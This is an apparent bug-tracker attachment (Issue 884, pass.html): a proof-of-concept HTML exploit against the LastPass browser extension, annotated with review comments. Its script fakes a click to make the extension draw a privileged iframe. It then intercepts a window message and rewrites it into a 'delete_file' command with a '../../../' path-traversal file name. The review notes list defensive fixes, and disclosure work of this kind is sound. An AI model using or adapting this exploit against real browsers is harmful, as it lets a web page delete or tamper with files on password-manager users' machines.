
Issue 884 attachment: pass.html (1.0 KB)

<html>
<head>
<title>LastPass Exploit</title>
<script>
// Trick LastPass into drawing a privileged iframe by dispatching a
// MouseEvent with the correct co-ordinates.
//
// Takes no arguments and returns nothing. It looks up the first <input> in
// the document and dispatches a script-created "click" event on it.
//
// NOTE(review): an event built with `new MouseEvent(...)` and sent through
// dispatchEvent() has `isTrusted === false`. The code that reacts to this
// click is not shown here; presumably it does not check `isTrusted`, which
// is the check a privileged UI should make before acting on a click.
function trigger_frame() {
var el = document.getElementsByTagName("input")[0];
var pos = el.getBoundingClientRect();

// Approx? I dunno
// The point is 16 px left of the field's right edge and 12 px above its
// bottom edge, in viewport co-ordinates. The author marks the offsets as a
// guess; what is drawn at that point is not visible in this file.
el.dispatchEvent(new MouseEvent("click", {
clientX: pos.width + pos.x - 16,
clientY: pos.height + pos.y - 12,
}));
}

// PiggyBack on a legitimate message and overwrite it with our own message.
//
// `a` is the event passed to this page's "message" listener. The function
// rewrites two fields of `a.data` in place and then unregisters itself, so
// only the first message it receives is altered.
//
// NOTE(review): this only matters if another consumer reads the same
// `a.data` object after this listener has run; that consumer is not shown
// here. Defensive takeaways for the receiving side: do not treat the fields
// of a window "message" event as authoritative for a privileged action,
// validate the sender (origin/source), and reject file names that contain
// path separators or ".." before any file operation.
function modify_message(a) {
// Replaces whatever message type the original sender set.
a.data.messagetype = "delete_file";
// NOTE(review): the leading "../" segments suggest the receiver does not
// confine this name to a base directory — confirm against the handler.
a.data.f="../../../../../../example.txt";

// Cleanup
window.removeEventListener("message", modify_message);
}

// Insert my own EventListener
// Runs when the <head> script is parsed, i.e. before the body's onload timer
// calls trigger_frame(), so the listener is already registered when the
// first "message" event reaches this window.
window.addEventListener("message", modify_message);

</script>
</head>
<body onload="setTimeout(trigger_frame, 2000)">
<!-- trigger_frame() is scheduled 2000 ms after the load event.
     NOTE(review): presumably the delay gives the extension time to attach
     its UI to the field below (confirm). The field is the first input in
     the document, which is the element trigger_frame() selects. -->
<input type=text name=username>
</body>
</html>